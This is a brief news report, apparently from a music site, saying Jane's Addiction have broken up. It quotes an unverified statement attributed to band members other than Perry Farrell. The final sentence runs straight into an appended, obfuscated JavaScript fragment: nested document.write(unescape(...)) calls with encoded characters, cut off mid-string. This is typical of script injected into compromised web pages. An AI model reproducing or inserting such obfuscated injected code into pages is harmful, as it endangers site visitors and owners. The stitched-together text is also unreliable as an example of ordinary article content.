Jane's Addiction seem to have split up for good.
The band reformed after a decade apart in 2002 and released a studio album, Strays, in 2003.
But the NME says a statement posted online says their 'volatile combination' means they can no longer work together.
The statement, said to be from all band members except singer Perry Farrell and posted on the Navarro website, says: 'What's the deal? The deal is that it simply didn't work out.'
'Sometimes things just don't work out. In all honesty, we have broken up and rejoined roughly four times over the years.'
'We do know that we really gave it everything we had this time and we actually made a really great record after so many years of silence. That was definitely a great thing and we are all proud of it.'
However the magazine says a UK spokesperson for the group was not able to verify the authenticity of the statement.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
